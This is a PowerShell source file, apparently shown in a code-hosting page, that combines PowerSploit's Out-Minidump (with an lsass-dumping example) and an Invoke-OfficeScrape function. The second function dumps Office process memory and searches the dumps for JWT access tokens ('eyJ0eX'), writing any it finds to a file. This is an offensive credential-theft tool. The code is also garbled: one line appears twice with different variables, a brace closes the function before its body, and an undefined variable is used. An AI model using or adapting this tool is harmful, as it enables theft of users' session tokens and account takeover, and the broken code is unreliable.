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185 lines (137 loc) · 5.04 KB

Code

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```
1
2  function Out-Minidump
3  {
4      # sourced from the PowerSploit project: https://github.com/mattifestation/PowerSploit/blob/master
5      [CmdletBinding()]
6      Param (
7
8          [Parameter(Position = 0, Mandatory = $False, ValueFromPipeline = $True)]
9          [String]
10         $Proc,
11
12         [Parameter(Position = 1)]
13         [ValidateScript({ Test-Path $_ })]
14         [String]
15         $DumpFilePath = $PWD,
16
17         [Parameter(Mandatory=$false)]
18         [String]$LogHost,
19
20         [Parameter(Mandatory=$false)]
21         [string[]]$User,
22
23         [Parameter(Mandatory=$false)]
24         [Switch]$NumsOnly = $False,
25
26         [Parameter(Mandatory=$false)]
```

```
27         [Switch]$Logging,
28
29         [Parameter(Mandatory=$false)]
30         [String]$Bin
31     )
32     <#
33     .SYNOPSIS
34
35         Generates a full-memory minidump of a process.
36
37         PowerSploit Function: Out-Minidump
38         Author: Matthew Graeber (@mattifestation)
39         License: BSD 3-Clause
40         Required Dependencies: None
41         Optional Dependencies: None
42
43     .DESCRIPTION
44
45         Out-Minidump writes a process dump file with all process memory to disk.
46         This is similar to running procdump.exe with the '-ma' switch.
47
48     .PARAMETER Process
49
50         Specifies the process for which a dump will be generated. The process object
51         is obtained with Get-Process.
52
53     .PARAMETER DumpFilePath
54
55         Specifies the path where dump files will be written. By default, dump files
56         are written to the current working directory. Dump file names take following
57         form: processname_id.dmp
58
59     .EXAMPLE
60
61         Out-Minidump -Process (Get-Process -Id 4293)
62
63         Description
64         -----
65         Generate a minidump for process ID 4293.
66
67     .EXAMPLE
68
69         Get-Process lsass | Out-Minidump
70
71         Description
72         -----
```

```
73         Generate a minidump for the lsass process. Note: To dump lsass, you must be
74         running from an elevated prompt.
75
76     .EXAMPLE
77
78         Get-Process | Out-Minidump -DumpFilePath C:\temp
79
80         Description
81         -----
82         Generate a minidump of all running processes and save them to C:\temp.
83
84     .INPUTS
85
86         System.Diagnostics.Process
87
88         You can pipe a process object to Out-Minidump.
89
90     .OUTPUTS
91
92         System.IO.FileInfo
93
94     .LINK
95
96         http://www.exploit-monday.com/
97 #>
98
99
100
101     BEGIN
102     {
103         $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
104         $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
105         $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
106         $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
107         $MiniDumpWithFullMemory = [UInt32] 2
108     }
109
110     PROCESS
111     {
112         $Process = $p
113         $ProcessId = $Process.Id
114         $ProcessName = $Process.Name
115         $ProcessHandle = $Process.Handle
116         $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
117
118         $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
```

```
118         $ProcessDumpPath = Join-Path $DumpFolderPath $ProcessName
119
120         $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
121
122         $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
123                                             $ProcessId,
124                                             $FileStream.SafeFileHandle,
125                                             $MiniDumpWithFullMemory,
126                                             [IntPtr]::Zero,
127                                             [IntPtr]::Zero,
128                                             [IntPtr]::Zero))
129
130         $FileStream.Close()
131
132         if (-not $Result)
133         {
134             $Exception = New-Object ComponentModel.Win32Exception
135             $ExceptionMessage = "$($Exception.Message) ($($ProcessName): $($ProcessId))"
136
137             # Remove any partially written dump files. For example, a partial dump will be written
138             # in the case when 32-bit PowerShell tries to dump a 64-bit process.
139             Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
140
141             throw $ExceptionMessage
142         }
143         else
144         {
145             Get-ChildItem $ProcessDumpPath
146         }
147     }
148
149     END {}
150 }
151
152 function Invoke-OfficeScrape {
153     # Inspired by https://twitter.com/mrd0x/status/1571533895744606211
154     [CmdletBinding()]
155     Param (
156         [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
157         [String]
158         $Proc,
159
160         [Parameter()]
161         [String]
162         $Outfile
163     )
164 }
```

```
164         # Save memory dump to current directory
165         $dest = $PWD
166
167         Write-Output "Starting Scraper"
168
169         $Procs = Get-Process $Proc -ErrorAction SilentlyContinue #| Select -Property Responding
170         if ($Procs) {
171             Write-Output "Target process is running. Dumping memory..."
172             foreach ($p in $Procs) {
173                 Out-Minidump -DumpFilePath $dest
174             }
175             $dumps = Get-ChildItem -Path $dest -Filter *.dmp | select FullName
176             foreach ($d in $dumps) {
177                 Write-Output "Scraping memory dump: $($d.FullName)"
178                 $output = select-string -Path $d.FullName -Pattern eyJ0eX
179                 $output | out-file -append -encoding ascii $outfile
180             }
181         }
182         else {
183             Write-Output "Target process not running"
184         }
185     }
```